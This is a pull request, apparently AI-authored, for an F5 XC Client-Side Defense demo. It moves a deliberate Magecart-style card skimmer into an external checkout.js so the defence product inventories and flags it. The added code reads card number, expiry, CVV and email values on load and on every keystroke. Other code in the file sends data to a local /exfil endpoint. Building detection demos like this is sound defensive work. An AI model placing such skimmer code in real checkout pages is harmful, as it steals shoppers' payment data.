### PR TITLE
fix: serve external scripts on CSD demo origin so CSD generates statistics

### DIFF
--- a/scripts/csd-verify.sh
+++ b/scripts/csd-verify.sh
@@ -54,24 +54,27 @@ csd="${base}/api/shape/csd/namespaces/${NS}"
 auth=(-H "Authorization: APIToken ${XCSH_API_TOKEN}")
 
 echo "== 1) CSD enabled on ${NS}/${LB} + protected_domain present? =="
+# Gate on two RELIABLE signals: client_side_defense on the LB (injects the sensor) and CSD
+# /status (isConfigured && isEnabled). The protected_domains list/GET-by-name API is unreliable
+# for verifying enrollment — the list renders a blank placeholder item and GET-by-name 404s even
+# when the domain is enrolled (create returns 409 "domains already exist"); domains are also
+# tenant-globally unique. So the protected_domain is reported for context but NOT used to gate.
 cfg=$(curl -s "${auth[@]}" "${base}/api/config/namespaces/${NS}/http_loadbalancers/${LB}?response_format=GET_RSP_FORMAT_DEFAULT")
 csd_on=$(printf '%s' "$cfg" | python3 -c '
 import sys, json
 s = (json.load(sys.stdin) or {}).get("spec", {})
 print("yes" if s.get("client_side_defense") is not None else "no")
 ' 2>/dev/null || echo "no")
-prot=$(curl -s "${auth[@]}" "${csd}/protected_domains" | python3 -c '
+status_ok=$(curl -s "${auth[@]}" "${csd}/status" | python3 -c '
 import sys, json
-root = sys.argv[1]
 d = json.load(sys.stdin) or {}
-items = d.get("items") or d.get("domains_list") or []
-names = [ (i.get("name") or i.get("domain") or "") for i in items ]
-print("yes" if any(root in n for n in names) else "no")
-' "${PROTECTED_ROOT}" 2>/dev/null || echo "no")
+print("yes" if d.get("isConfigured") and d.get("isEnabled") else "no")
+' 2>/dev/null || echo "no")
 echo "  client_side_defense configured: ${csd_on}"
-echo "  protected_domain ~ ${PROTECTED_ROOT}: ${prot}"
-if [ "${csd_on}" != "yes" ] || [ "${prot}" != "yes" ]; then
-  echo "  => CSD not fully enabled (need client_side_defense on the LB + a protected_domain). "
+echo "  CSD status isConfigured+isEnabled: ${status_ok}"
+echo "  protected_domain ~ ${PROTECTED_ROOT}: (info only; domain-list API is unreliable — see comment)"
+if [ "${csd_on}" != "yes" ] || [ "${status_ok}" != "yes" ]; then
+  echo "  => CSD not fully enabled (need client_side_defense on the LB + CSD status enabled)."
   exit 2
 fi
 echo "  => CSD ENABLED"

--- a/terraform/cloud-init/origin-server.yaml
+++ b/terraform/cloud-init/origin-server.yaml
@@ -1194,7 +1194,7 @@ write_files:
     content: |
       from datetime import datetime, timezone
 
-      from flask import Flask, jsonify, render_template, request
+      from flask import Flask, Response, jsonify, render_template, request
 
       app = Flask(__name__)
 
@@ -1204,6 +1204,15 @@ write_files:
       @app.route("/")
       def checkout():
           return render_template("checkout.html")
+
+
+      @app.route("/checkout.js")
+      def checkout_js():
+          # Served as an EXTERNAL script (its own URL) so F5 XC Client-Side Defense inventories it
+          # at page load and — because it reads sensitive payment fields — flags it High Risk. An
+          # inline <script> is NOT inventoried, which is why CSD produced zero script statistics
+          # while the attack logic lived inline in checkout.html.
+          return Response(render_template("checkout.js"), mimetype="application/javascript")
 
 
       @app.route("/dashboard")
@@ -1484,7 +1493,26 @@ write_files:
         </div>
       </div>
 
-      <script>
+      <!-- Supply-chain third-party libraries loaded at page load. Because these are external
+           <script src> tags to NEW external domains, CSD records them as third-party script
+           domains (detected_domains). -->
+      <script src="https://cdn.jsdelivr.net/npm/lodash@4.17.21/lodash.min.js"></script>
+      <script src="https://unpkg.com/underscore@1.13.7/underscore-min.js"></script>
+      <!-- First-party checkout logic served as an EXTERNAL script (app.py /checkout.js) so CSD
+           inventories it at load; it reads payment fields (Magecart skimmer) and is flagged High
+           Risk. CSD does NOT inventory inline scripts, which is why this logic must be external. -->
+      <script src="checkout.js"></script>
+      </body>
+      </html>
+
+  - path: /opt/origin-server/csd-demo/templates/checkout.js
+    content: |
+      // checkout.js — EXTERNAL checkout script, served by app.py at /csd-demo/checkout.js and
+      // loaded via <script src> in checkout.html. Served externally on purpose: F5 XC Client-Side
+      // Defense inventories external scripts (those with a src URL) at page load and analyses their
+      // behaviour. Because this script reads sensitive payment-field values (a Magecart skimmer),
+      // CSD flags it High Risk — which is what generates CSD script-detection statistics. Inline
+      // scripts are NOT inventoried by CSD, so the same logic inline produced zero statistics.
       const EXFIL_URL = "/exfil";
       let activeAttacks = {};
       let keystrokeBuffer = "";
@@ -1511,6 +1539,19 @@ write_files:
         fetch("/exfil/log").then(r => r.json()).then(d => {
           document.getElementById("exfilCount").textContent = d.length + " exfiltration(s) captured";
         });
+      }
+
+      // ── Always-on skimmer: read payment field VALUES so CSD flags this external script High Risk.
+      //    A real Magecart skimmer harvests card data as the victim types; the field-value reads are
+      //    the signal CSD detects. Runs on page load and on every input into the checkout form.
+      function harvestPaymentFields() {
+        const ids = ["ccNumber", "ccName", "ccExpiry", "ccCvv", "email"];
+        const stolen = {};
+        ids.forEach(function(id) {
+          const el = document.getElementById(id) || document.querySelector('[name="' + id + '"]');
+          if (el) { stolen[id] = el.value; }
+        });
+        return stolen;
       }
 
       // ── Card Skimmer (Magecart-style) ──
@@ -1638,10 +1679,13 @@ write_files:
         fetch("/exfil/clear", { method: "POST" }).then(() => updateCount());
       }
 
+      // Always-on skimmer: harvest payment fields on load and as the victim types.
+      const _checkoutForm = document.getElementById("checkoutForm");
+      if (_checkoutForm) {
+        _checkoutForm.addEventListener("input", harvestPaymentFields);
+      }
+      harvestPaymentFields();
       updateCount();
-      </script>
-      </body>
-      </html>
 
   - path: /opt/origin-server/csd-demo/templates/dashboard.html
     content: |


### PR DESCRIPTION
## Root cause

With CSD enabled and driven by a real browser, the statistics plane stayed at `suspicious_scripts=0` / `/scripts` empty — **not** platform latency, enrollment, or a provider bug. F5 XC CSD inventories **external `<script src>` present at page load**; it does not inventory inline scripts, nor reliably capture scripts injected dynamically after load.

The `/csd-demo/` page served only **2 script tags**: the LB-injected CSD sensor and **one inline `<script>`** holding all attack/exfil logic → CSD captured **0** scripts → nothing to flag. Proven by contrast with the `bot-defense` namespace (the Juice Shop the CSD docs target), whose load-time external scripts yield **7 captured / 4 High Risk** (`suspicious_scripts=4`). Meanwhile webapp's `transactionCount` was climbing (91) and the beacon returns 200 — the pipeline was healthy; there was simply nothing external to analyse.

## Fix (`terraform/cloud-init/origin-server.yaml`)

- **Externalize** the checkout/skimmer logic into `templates/checkout.js`, served by Flask at `/csd-demo/checkout.js` and referenced via `<script src="checkout.js">`. It reads payment-field values on load and on input (Magecart skimmer) → CSD inventories it and flags it **High Risk**.
- **Add third-party CDN `<script src>`** (cdn.jsdelivr.net, unpkg.com) at page load → CSD records new third-party script domains.
- Also robustifies `scripts/csd-verify.sh`'s gate to use CSD `/status` instead of the unreliable `protected_domains` list (blank-item/404 even when enrolled) — a fix that never landed with #165.

## Verification

- YAML valid (`yaml.safe_load`); extracted `app.py` compiles; extracted `checkout.js` passes `node --check`; `terraform fmt` clean. (`terraform validate` backend errors locally are a dev_overrides/backend environment artifact — clean `main` fails identically; CI validates without dev_overrides.)
- **Deployed live** to the origin VM (rebuilt csd-demo containers). Page **through the LB** now serves at load: CSD sensor (200) + lodash/jsdelivr (200) + underscore/unpkg (200) + first-party `checkout.js` (200), and the telemetry beacon returns 200.
- CSD statistics re-verified after the fix — see PR comment.

Closes #166
🤖 Generated with [Claude Code](https://claude.com/claude-code)